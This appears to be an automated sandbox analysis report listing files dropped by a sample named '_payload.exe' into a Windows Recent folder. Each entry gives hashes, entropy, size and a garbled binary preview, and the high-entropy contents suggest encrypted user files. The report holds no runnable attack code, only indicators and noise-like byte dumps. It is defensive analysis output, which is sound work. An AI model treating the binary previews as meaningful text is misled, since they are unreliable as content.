                                                                                                      Preview:DVWHKw..z>._.[.=...!.%..h.....U..]W.&O.9..T~....v7?....v`..~../K.%......#+.$..........-..=.~E.d."...(W...../p|l9W..d7~G......`.8 ..%.=...k...K.N.<.._..s.9D....OD.tN...)....%...L.."..-.Z8.....Rhk.B.[5.>Q.T.x..LQ..Mf.\.s...]...Mn........[..I#.fl.A..\.Y...\.N....@...:...4...Q>.J..7.(..J\Z2...|D..`.t..J..V..Ji_."{"..L.9x..N1.C.U...].!.F..Il....<....D..-K.:..K.....&..Xr...3.P.....y.q._.........[..Ac$y....L.p..:...e...K.z......,..".$.L.KT...l..\=.G,..W.F...XXL3ES:.u[E3$.^.c^..7..Q...R.j>....D.....=..3S..N/e.v....O..LVA.s[.......w.F.....h._.C......&..x<?w..j../..d.Z.V......v.V......,.=...........WC.T....[.../cU...+.h.B..:.....[.....O..?l....kp...o..42..t....R;&0xY@M2..h...G.."\+..^.z`.D!..u.>...-Y$.P.....&......@jD...)l..-.......{ySv....4.j...I.%....J.V6.$..3.C...]]pk...*....Q|.W..C...r.dG.[....K..=9p.@..G!x_f3'...K..............gMM....._i.2.>j.)N..):K...R...x.c.nt.O4s....i.e!...i....N...gb..g..@R..Hl..`.T....n..opG,n..U#+.MD<3.#..l....

                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\EDCVNYNUAA.jpg

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.86490038812188
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:Od2VQ+6pU4Mg4uLNib7aheF2r380z0W41vx7PXJC70P7ip5q9gid4Ov6bD:Odqphuxiyhe8Fz0Wuv9c702kg8wD
                                                                                                      MD5:3ADA771FA39F652D8A93A8E2A80DB0C3
                                                                                                      SHA1:8A77582B229F94DB03662A94F8B90183E436DD81
                                                                                                      SHA-256:B0E59826775E28A6C08F3D442A57AF3D887BC4F71AF14739D795532FDFAC3164
                                                                                                      SHA-512:D6AF5E4C632FFF4CD11132034FACFD1A1DBBD27B46C80A5CAD331D56541F6CB8983374F8186A79205BD6331E0C82650526AB53765E83F8FBEB906BE1457B5825
                                                                                                      Malicious:false
                                                                                                      Preview:EDCVN%V.)9=j....9`..4....Y:..u...aH....l./.$....<?..C4.h_....W.....y.e^..8.D%...........mRO...9U..=."..7c...m..0M.A.iM.<.R.[.* ..R.[...1r.t6..V..N [...c.@.\..Ce........Y.cC.....3.c...._.c...i..cp...=0..)..>........e.U...x.3f].~...P...i.....UaeJ`)]m..e....t.If..N.Y.1.;..%x.*..[~..._...0]...eHi.|.......z..n>.TG.. !...s.!...s.1........'RX.Pt..+.z@..u..C.xE...=L...11.<...R..w.{&.$..gF.....A....."..8p.....NQ..5H-+n..#D..r...c.iR.v.r|...G`......W^..V.w.L..A.4nb......U...k._..J... 6.pN%0...p.,.@..6.J...s..&..k......6*j...3.h.k..g. ..q..B.M..}".P....O.d..2'..JQ.....K....C..WC.(.a....4......ri..2.r.9..D.R......Z.>.....E(A."...Oj.0.....6...;........@.p..\./.o.6]M@......O...K.I..[=gZ.Ix5.r7.!s=.Fw.^|..<.^.......?....)..*iJ.T..Ge..._+....'..v.>...=.18....p.x?..2F.....;!.....T.....k.[..).......M.*...R.^.D..k..fJ...F.M8.7....uIqY...#!(N..z...k.L...t.>Q..G.w?Cg.%..|...k.n..<.q.(......7...*_.&.;.w." .{.3<.$..|.....q.K....[;.......q.9qh\.Y`u....

                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\EDCVNYNUAA.mp3

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.848455547958467
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:3/KPw5k0z2x9l65JL8QDG4dCizslFZrAd0s/c7WrDbnFt9URD9dv6bD:3A06x9lSS1ZEsbZrM7GpnwD
                                                                                                      MD5:E8C9FA90C81E9920EACFF363FEEFDCE3
                                                                                                      SHA1:51BD960E5139F0D707B9C128C29966650F75AB69
                                                                                                      SHA-256:FF9FE82F1F9F062B17EF47A5914905B34E5DA847F85695D1646C4E6FBD589355
                                                                                                      SHA-512:485E3E54DE742706B772276C66094E5CCBA7499AAE800A790F8D1F2A029246800FC8F664E683FF552F41E7BB6EBC64CB63E5519A8BBC1766FC8DCB4CF62F3F04
                                                                                                      Malicious:false
                                                                                                      Preview:EDCVN.Qi.Al-.$-..{j0l..S..o.;L..u......v..Zg...........F...0&.0.'DG.%.+../[....gt...8....r:.......s....Ox!.........A.&v.+*C..ah...l.=j.N3"..v2...g.E..2.8......A?..F....I...dU^...*.tZK..O..R.}..K6.J.).+..1.K.L9.mq..p..U.....'F..p..>.......O..X..~.w....V..U0,;.bML..&.F.f#6...E`.an.e>t.[.$......\...;.=.r.v..Fo.?..+..T[.n....>.W\..0C.A .......\q.V..D...[|...s.Y...^.P./P)D...x......B.~..{..pG.fJW.`8..."?$..j o..pN...,.$h7W.t`"8M..'+..A.JI....Z.e.......;...*.0Y....*d....S.j.E...s..y}6.H\.."t'.c.]k..$.@*0v..t)...|....y?..K?....1.n.....n...pi..r)L;'..[Q. :[1.k.e..6.t..w.. ....?.."..GV.4.....o.h........V.u..,.d...}.}......i.......e......j.@.6..f'$h!.......c.#....aj...!.G.P..........NL.....Xh6..".....#.*..UN....]Bjf$...4.ed.......V..1.{..7.t.aV .........#4*hb{..w....amHTK....nn...G.Y.?E......K7.d...+.......J....X.......D...G..._h..D.@s`....."...K.._D...<........7..cP,...k...C..lVF..k.Ho...n.!.q4....'....Z......6.wKXJ.coa.....e.=..3.i>&....(#.[ .

                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\EDCVNYNUAA.pdf

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.84109425492658
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:Mc8TkoGghpJhoZCWlj56UbgUm/DW1DZc5W3y4+TBezCsk9aZr5uSkxKYCDHxv6bD:MzQcpJhojM9K1DyM1+TIzCsqmdxBdwD
                                                                                                      MD5:E1E5CCEFDA2779D5F50C64AC2F4F2192
                                                                                                      SHA1:D7368A2BE2ACC5CB51D2437EEB473E601D175938
                                                                                                      SHA-256:9E4CB38892A1D51D56729C768C4AE05CAB6EA586BF0B9547BFFC64DBC89AE9ED
                                                                                                      SHA-512:132BEB7EE26E850442675CE76A0B6E160BC309B11CA8AF702CC58F466AD2E8D085CCF29D99EB79F5CE12A35B30CA154918215E8AA1B32E629AE27599B79D8B4C
                                                                                                      Malicious:false
                                                                                                      Preview:EDCVNm.q.z...#W...i...a..j.!LJ@.....e..xj)}.=...IxG.......GX=.o8..g4$@z.I$.'.....J).<....V.CL?...}.b...9mu.>...@.8p...!...Id..lz..t...A.u.qb.7...K..h.e..G...g.7..).}N..xC.6...|?.-k.L..).I.......k>...].Y..;..".....M.o.~yA8}..3.USu........WOE\x.\..].......`t...}.D.....e...y..c7..u......:r4.g....t.J.'/..Jkf..w..S3..u69....CC.......54}.\.-.g.@km..*N..vS...Nk.......L.H.....*......X.....rU..M..n.i...7D......Y.9...M..[A./....r]u..?Q$.O1...a.@...A........8l._.D.x.q.._e...%...SP$..2...vr.;..#X....u.x...q6E..3.V...J....B.J.B....._......U.k..*.C|].Y.S]s..oI...5y.B.....O....9..FI.0.#5.N..0".R.^.1..f.-..,...i..kh.K..zHN5:.GL7....t'sn.....k.../.~#P......u.>.C.K|K.8j&:O(..h.%.7f...Y=..Ve..!..~....h...G.W...H...`......"}.\....2..]'...q..3........*}...G.W..e..En.A.:.NK`).4.<>..........W(..S...Bj..6...^..bn....S..6..r..=.....`RmS......+@l.-g.2..M.P.....4P....o..(k.e5..1C.OP}G.F...z!.g@..vy...).B<!n.d.V.<.b~w-...c4..YU..G/q<.dn.r.S>..I...q.~

                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GRXZDKKVDB.png

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.8587653292048545
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:pN1cyjnFd5pLjyDqF2h5AFvyByjV/lw9I0gs4MTcr+js10dFbNnv6bD:f9VpnyDAUUqExlw60gsP4+X/wD
                                                                                                      MD5:CA7CBD4030147A892E6E3C6AC6F3E897
                                                                                                      SHA1:096CC4BD7332F62117F67A5A583FD0965DA8C6EF
                                                                                                      SHA-256:72B727C7A7881140D31AF59145C11F49EE75960577F1F4ACB3490A9609914A48
                                                                                                      SHA-512:913E97200C1D7354E3F934DF45F842E01208B22DB3115EE4E6CA9E2E417D527654CF3D209125DDCC3B74841D9110090E48E57DB9AFA0880F0FA6FD4BD1584AEC
                                                                                                      Malicious:false
                                                                                                      Preview:GRXZD...rF..m..-k......e.....G>U....t.....q}g.F./7)..UuRIo..u.I.....~...^...!.......ba.7.0..]O....;E....5J@n..T*>Y.<..CuS.......C.L1.e:(SAV]....d....]xwC....F..mT.!.([...YdHuvt....a.{..n.\s.H...\.(..|6......%;r........8%..P..^S.^....T@U..p....}.E..7?.*."......f..w...ZU..;_<..;..{.]I..8..V.q.:).n...X..<.....i.IV@.o.h|.........:D8m;..b..x.N}^...D...B..KK........3.2.e........../.:..v...B0...m^{.O.......H;.@..w2.J-.z..;ZGm.."...z.y.2..A7e.XCn.yl.$?n.|dG...Ht.8Cp{\..0.U...zl.FL]...d<[.O..Y.y~~@...............,.i.......5...um..Z..'.n!,...Q16.e..:.W.OU.....;.>......4..GV36^......e`..5W.1.I.oh...(-u~....E.....@jf..*....%.|.......k.......T].t....eeK..4..xA'.#..2..A=b...A.Nx...,1f{....N.j..#...g. .i.I\..s.).......RO.`... M.Z.Dr.....)..."S.d..J.O.......9.....Y!.:B2.$J.1D.V....7E.t.$A.><.ym.#c..W}.K.+@.....e.+.'.$h=....o..n.....-5.e..JB5b..m......s.w0..*...}..q._..bD3....{.....^($...<..o\ l.:...I....w%]..#.[>..-j.&.6..da.G.@....)..Wg..Ds.h..G

                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\HQJBRDYKDE.jpg

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.835061321427616
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:B9cHRw9NxHjmyurodl8JC78RGJ93s7WGRXnAboEOMpv6bD:HpHjmyusT8JsAG7sXwbXTwD
                                                                                                      MD5:FCC45106FC07D44BDDDC258918BAFB7F
                                                                                                      SHA1:FF912406F42CD8BEDD64EC7008E1B926887F7B88
                                                                                                      SHA-256:3AB0978F402D5FB96D7F5FBC39911EDC5D79B827E7C5F635B4335A9899D99EF5
                                                                                                      SHA-512:94288F27558FDE2382159891EC899E3CC25420286F2200053A943954FB43D788E83041679788B7DA310BE261DBE9DCE5BD3A041B07B8B1D159A17D87B1B4C0FC
                                                                                                      Malicious:false
                                                                                                      Preview:HQJBR........U'...W.|}I....7...03;D.JgA..\.z..k..L7.........Z.mE.aM....,9...;.*.@7\...6.aT.}.).............YT.M6'.cr.Ip....#Xy.....hA".vSP]<..k.<.T....g[.C.??.....*..e.y.J..m....E_.S6....{|.D...`UKm...Z..*.N...-.V..EeZO.....q...Y(Z......[l..6.Q.Q2*........g.%_#>H.wAR.cDe%..'\|...SN...{.CH....`..b,a..7./.X..........5?..w.E.....t.[Od..C.~ ..T.....`....!E.k..3.6H7l/.R........O.IM}..0P.....\V3...Y.n,Z..=....5..HGHY....Ky....D+.6.8<....5.T5..I...%...;..T.....?~A..<t.R..p....MipGI......"....+ .c.k..BO.IU.FaP...(......$.......W.<a...vsh.B.fb....vb..,..W&3...1...&....3.&X../........P...O..u.Y1...U=.g....m...;J.p....P`G<.T.F..E"....I....\..).K....y0)..'v.%...,".4...'1^.C7.....#....^u<h?a.\2.V).....OxQ.7.&........$J.........N.._.R..7..e..!.$.,.i.4.$E.....Vm8*..b...!. KT.'.q..vwg{...|...8.....b}...'c|b=.c...r}.-....r.zz.........y0e...'.q:...,K6{.."b..........~..TUo.*&A1.....W.G...".T.R5Q......79........b......4...su2.>."...6......<.2.?K.U/

                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\HQJBRDYKDE.xlsx

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.868986404608873
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:qbg6AuPrmhcpqPj56+tjzUmkN/iMYJvgbFuvzxwSoJ+gDLiOP+av6bD:qbg6AWrmjdPjzE/i/JviFuvzxwbpHPDs
                                                                                                      MD5:DBBCE967EDB823A1042D4BEEB22A8D02
                                                                                                      SHA1:4D4EB86D85F84CE467FD9948BA2B693E8DE46845
                                                                                                      SHA-256:982ED5AE13F51A90FB9767DC2CAD67454ADEA07D2949FA51A6FC08A5CD548205
                                                                                                      SHA-512:4E2A2DA2447B7AC7DAE442F20FF1B8B699053BA8CF3F0AF17749F9C891432D8830B9D78EBE0CEE24635467B16632BFE24984B2A9F696B5966903C0BEB07E4F97
                                                                                                      Malicious:false
                                                                                                      Preview:HQJBR......DX.....%.......,-.ZM..<..8..>.&b..]aF..x..U.=!."...z.~.[.....K;.~.w..c .....k.R%.y.'._X?.1...#..nyM..W.o.k..*Sdm!.m...>)W..1;.....kb..{=..`..i......Q....G[.....>Sa..P.k...._.sW.n.h,..lV........e...}b..H.._.....[.}...c......H......R$.!$.$.e..Or.....2.U...;@..M.......?..D.AS......(.n.C..W..eK.....P.....&5.J.I..kC*....Re6M..>.......^].....g.7...'..F.fOO....).m..J9*7.:.2.G;(.j.2...'..D.....m.f.*[.U`.TOj..FB....g..;.2...Vp.|=.J:0.........[.6....|X...T&.fyPV.F......B.RE....c.....\..T.a...O..BU}Mf..n.j..=...Q...i/F...pg[.Y..Y...<..uf.._^g[uw.....U1.......*..j,..,5...x=..G.3^e..9..2.......O'.....^..|.0..&.....2.2....).2S#y.x.i^.k....O.n.x..A......p..0u...{Rg....%#......Sd...T...@...2n.X2t..V-.3..g.>.`.....3.^....~.........P.m....!I....".u...2...w.Kp/H"~-*.S.y.r.Y.~...q8....J.....eu.......}$..k.SD#.E.@..?......w.w..C.?..+^Q*.p...D~...U?..H.rVn.3"$.....`...$.0....:..6.......h....%?>T.+.=.(.....y...."..#..1...WQ....T...o..suz.....

                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\HTAGVDFUIE.docx

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.863079897846557
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:aJnlUOeJvh7a1hPOydwtt/Bd3r299A/5NMM3Li7Qr0ln1nv6bD:cnlUOGvh7a1toznDlbmQ4l1nwD
                                                                                                      MD5:A932C7CD63F0101AEFF3A1BB65F0F63D
                                                                                                      SHA1:349CF5F750104AE89DBE0C7A83D2951C88F133EC
                                                                                                      SHA-256:5CD1460B285A23F2D812A45D92CD0C7AD1FD7682FA24355E07AD9B0F3C603D6D
                                                                                                      SHA-512:C44923F7CE04C1A61A2DF25F7B62ABD2CD642304EFD53976592EF92D0545F64F7655F0B7E87B1503E8990C8FABC519C113FF8FB44DD8CD4CF8A0C8D5A5267C4B
                                                                                                      Malicious:false
                                                                                                      Preview:HTAGV.d]...|..R.F.h......P`Y+I..3..i......)s.F..x.#....x..QV......WUlR..............g.HKOi.(.Qsu..q.50.Z..Ofh....Uz.j.%..p.p.y...D^..Oe.7J|DV.q.R....y..L..^a.2.....\..7......+li....@b.^ji...._.8..U..T.].N..\o..*b..."..t.{.../........r.k=....R0..$X.:. .:.....(..B...{w...A....}.>.....Y.LC.a..T#.p...k.........zO).Y[bx....a{.B.:]."T>G.p.%yo]....Y.......mU.u.5..aJ.bF...l..........}......_..5$.....}M...U)....Qai..Z.......a.........RPX~.}w.2.3.10.?......E3.9.@:.*...#.D]n7......MC...1W7<b...?......#..}..........<C).tx.m................B]...t.P(3)..!.....*......z....g...A...T..V....7|.o..j....,..(.wot.1.c...I.Wo.p.t\.....p.....;._N..QN.u......y].y..u...}.x....~8.^v..X..^.agO...d3...$:q.%i.]1...F$S".dP.(q.p.S..,-...M(...l......C.C..8.I.p.....d..z..+;...#..uG.....<.(Pv#.........].;ycj.*.U.S..z....".W..R.e..C...OAk.kaR.&.g.W#,L.y?....b.....>$1.E.Y.! ?....r.(...D..0.A...9......*.A.g.......T.Z.PC.`..+..u..el9..7...[j..[K.....p..[\....+..+....]....

                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\HTAGVDFUIE.pdf

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.86715531453301
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:ypfZnqziqFK1bBkbkVRex0gi6EM2kfYOqKe/C42U9zNCvh2Qfv6bD:MZY9FABXrex9EM2CqDb9hCZ2QfwD
                                                                                                      MD5:A8611A40174452B39A985050EE0598BA
                                                                                                      SHA1:2AA2A0D58F46395CF95EED849739A34BC3E14DA4
                                                                                                      SHA-256:A656E7CF0D3A4327B85F947503164582C81BF1840605B07D40E5F633392A462D
                                                                                                      SHA-512:6EC3531D5632B78AF603E14BB065E2F851702488807894BE482A0A3BC957D6C0A0D4A4D3E5128B7429A8E8C4A74EF9DE0FB958CCCB9C1A09349E9481AB0BDF3F
                                                                                                      Malicious:false
                                                                                                      Preview:HTAGV.i...4.U.9V6/.wP;.eK.(.A.......)b..G...(..F...e.q...rO..p..W..J3+.35.....c..C........Z<YUqn...>.@)&../........(Y..n...C2d.l...,..K.M%.......G.FZ=...._I.2O.yP...4....iu..q.t.....fAJ.0...L?. v...nh....h...b..\.....J....%F-.W....qw...#..;..h..Ym...W.5..}.J7....^...vYO..^.i..#T.....'....`.;...\..!.i9..d.s.a....7.......Xu+..........a...M..(./.W...3\...^m).....?..rD..._........0..yr....$...2; .7f.1....J.^M....."j.)vn(.Z....X..Gfm!wI.....;..~.ZP.....,'m.3....O...bF.....BG..V..%....WlX*.j0..o....q.^.~...i../..y..$RK.j..g.i."..m-.....9H.R..P%.........3.}[.A....../...u..n..+.j.*_8.\9.l..w....*[.o.Q5<`.)......h......v...f.J~...._G...'.IY.....Em...Wo....j.h...S.f.,I..{...E^.ZUwj4cF.k-.Pk..[.J......U.v....o.z0.atq.K....cl}?8.[.?.d1..Lk...._"r..R.".qg..HB..=...@b.g.....T...-aKck:@.?"..Bd.5n~...*.EkB....P.$..CZ..u.&J...".I%X.......rQ...C.. ..p"W&.3+{.+.*._A....... .}..G....lw..N.!.b..h..+-...a....3.......z.~..a.I...;y8...N..^dIR....~.n...A....|(..%...GH.&..

                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\JSDNGYCOWY.jpg

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.862213534559089
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:OL6DQR5v8fjozsNfpbsgI3eZeZovj72hyif8RryuiRDi3ERK1Dv6bD:OLoQROLoIlsMrvjKhtURTitTKBwD
                                                                                                      MD5:C84F9EEAB271737344817043A1B387F2
                                                                                                      SHA1:1D39C27D5C42C85A33ECDE745780D15CF98D801F
                                                                                                      SHA-256:C966EAC4F24923CB3B4499580FAD9AE6FE81ECD98696A125E2DDB7FB5ED215CA
                                                                                                      SHA-512:B479C7C2872D9849D39A5E938D08FCA1D861A7ADC939D80FE87EF7F0BFB0144C1D4004A8F5058B682C80F48C35AD64FDA5546947A59DF8B7FB00B959D61FC7AB
                                                                                                      Malicious:false
                                                                                                      Preview:JSDNG.hT..../(....]N. $Kl...V..U.z.5O.G.$.....+IS.G#O.....;.sq.MP.....v............H.q.'....u$..8.\.]^r<{.oI...%^...hT...n9.I.t...]....V.9..1.....2..(.{.....-....pA.d..@+.HL=.8.\..p.......b....7..6..v...j.O/^9...!..9"...i.t.l.J..a......W.'$7..)Jr.2[/.;..x..ub....&......+.........?.}m.mi7./..D.1.'.,Dn......7k'...[......N...$..d..8.,t.....+.\;...F.a.+6=#_.?...&...ze.I.f....qx....GNfC...........j...d.t...e...T...t._xSWc..G...'....d..cc....%.<.@V/E........z.\2.C;......W....@..\J...eu.]dd...{.?...H.y..... .0.({..+.`.......Us.mZ.......5.....N.s..D.&S$.,uT.dc.PP...J..^.G...,2.36.5X.`t.|q...[.Y..rt.]..S.Z%....Y.Y..g..X....*.z.u.'.B..) ..\A*...d..K..t..F.R....!..h..PF.o.E.x"..GK....)f....lNSd....,G.XL(..(....5...$.$..6...-..."...6s.g:.8... ..xP:...tR;..ghx.b>..9P...rA...$..%...Q....Np...=..-G0..C....G.......%....;1..A..B.-..&.L..)....E.^$.}V.v&.....t..Iz?0.L....|......um\.....!w4....s2....G..4..v.r.....5.?a.F.5.%N*n1.....Y...C........uJ..v..I.

                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\KATAXZVCPS.jpg

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.845797905050693
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:LMKtzUXqjeSb5DLviVN9milLNGu/x9FDytjpnS0DjFRRb2Cpj6yxaYzeNXv6bD:LMKKXqF5XqVOil/9FD+tnS0Dj78C16M9
                                                                                                      MD5:BB4532B43923A63C66319E549622072A
                                                                                                      SHA1:441EDDA888EB38E34895596F26527BBE26F015C1
                                                                                                      SHA-256:21EDD85EB458F9601D53833406F1BBC84452CC3EDDB17ADAA03FF72F06525739
                                                                                                      SHA-512:58E78C2DE9EA956CA067C2ADE046024CF7869FC40C7FCA179B25E271096726522463ABD1A5B31EAC79BF3D6F8571144C71E747ADC3A0D6BB5B965117C24F8D06
                                                                                                      Malicious:false
                                                                                                      Preview:KATAX.u...*.E.?0>D..D..3....G...$...dg9............y........4@d..<................lbK.g...-.1..`.z....L...'He...S......Q0}Q0 M.....y.Q...........dj.......x...........s..!..R..l.........D%...e.1..C..3.1..V:..../.kZ...0.".Hw....R..T.?..*.S..a..-nR..6iX.{.....<...#D..)VQ.F...Ppw.&...C.eyW...].^-B3UTT>..=../lDJ..T..B....n...Xw>?..5..9.].dJ.z@.#....l9.1.-.z....D... JI.y.i.......IX/..+.}.w...oc..A#.../-.5....j...s..y..x.....h....;.cz!`../..b.)3.K5J.hK.Y.X.- . .%K.:jQ.?Z.O.......i..a...+B..z..ydP......f..5G..;.qZ..<.?...9dM.Y...uWB.ih..C!r.X..om7.... ..dBI.'.X..$..o.,......n..%9.U....#._C.(..E.U..2..jZ.KP.V.'0O.LwUi.j<x...^..m.p.z.K{ .b7.l...........-...P~b...geo......C...F...9...N...}.(...b.w.].1n....f...v."x.GV_,U=.2..2}..8....@...|3zs.7.... M}....u..o._.+,H..M...Bx .r.q..".D.0.....`..aQj..l.....gd2..."...P....}..d9.8H.....H.Q..KI.x...b.Dsk......1...C........*-....h#?l...1.....:2..e%^tk$.|...h....0..sB..)=...f.._U0.#U.X-..*C.)- T.h..Y........?

                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\KATAXZVCPS.xlsx

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.85116890561353
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:AY5qofm4+MCKBVSmJibQ+OxHDwUZpoOf90RD9v+Dhk9fMHwgv6bD:8hyBVSo+GcUOi90RBv+VVHwgwD
                                                                                                      MD5:BD4CC4EE1C16DC4A6BC2237B6ABB1EFB
                                                                                                      SHA1:B1DDE237948FCD2F7344D1AA7CC5C453460CE2D8
                                                                                                      SHA-256:4EE10B1841CE04005BD7192AD86D85C1511C065BABFEBBDC3B515654BB1C1C5A
                                                                                                      SHA-512:9443FD5A5071C14703A8F02676D23B5B92783B2C6CE3FBECF4EB119C16C84F4D849FAC35E19DFAD82F29D6164117E652C2B0B80227CBEC6BBD78E3F0F747EC40
                                                                                                      Malicious:false
                                                                                                      Preview:KATAX/.n)H.....&h.s....X%....Xg.....zg,cgG...I...D....n...bi..7W#..s...~.E_...%^#...$..q..l.3#f=.1..........~..d$g.........]...0...G3.cS.5G..x.S..d..1...o.}..#..1.#c..^...y..\0.B....>.QN/k.Qki*..x...)............R7...qi.h.../<.e..........k).o..)..5.._NBa.9.~..v4'%...@.G.PD.T.SA....w.]...3...E....tp...0....L..^E........B..k. .......?..V#...m...p..........M..........l/.p..K.-^..1.{k._........4..P.S-.Ua.Z.p....;O.G....8v.1....&R.#(.}.w.\...n'.......-./..6..R.c.k.c.on8.6V.......%;..`..e.....DV..*..^.....|hsUr.!..'..!@V.qIS.cX..AV......4.n.lW...s.nF.4_....'?.J.E...........1.6US.|[I=~....``.^.,v.=.}^%..*........b?.../%.v..B..f.j..>UB.G!..... .9.q.+V.P....~&..........".XA/..]<.).......~bp..._."...]..K....7/tJ.|..p..9W...*}J.....C..[.Y8...JPa.\..>m.rN.....m.Y...b .Y. g.^.....;=...$.p....1}+..DV...n,%\*2[..nQ..ULA@.EP...-<$Yi...m.....#D=;.....R..V.n..>i.uj....m.s).X..CC.r..IR..;..n&..*9..x[.......Md../mzl.9kt..* Q.......Z,..<.B.H.w.......{`m+.>o.L]5..5Kw-

                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\KLIZUSIQEN.mp3

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.863899528494633
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:bFQg59KGE395M91wY9DMmqRhVv8Gp20TDZ59OGw7qO+VFnkrTv16v6bD:JQOvE3Swvdv9pfDb41z+VE16wD
                                                                                                      MD5:E5F38F06F23C4E47D26257A1AC940CC4
                                                                                                      SHA1:84CC3088B31CE1F25A54ECB9B6CD6B28BB425EEC
                                                                                                      SHA-256:154B775C3900E6D1FB6E94186B9BCB34174D78206F14F188BAA8CB28DA2000B5
                                                                                                      SHA-512:9D5FE02642475E2BE980ED853515C8B6B83B1D2EA31BB25DD4576C6BD360E21288354C5EEDA111FD8F4A54677AF028E1DDCA980E6C54AA6819C42BFD84C73B34
                                                                                                      Malicious:false
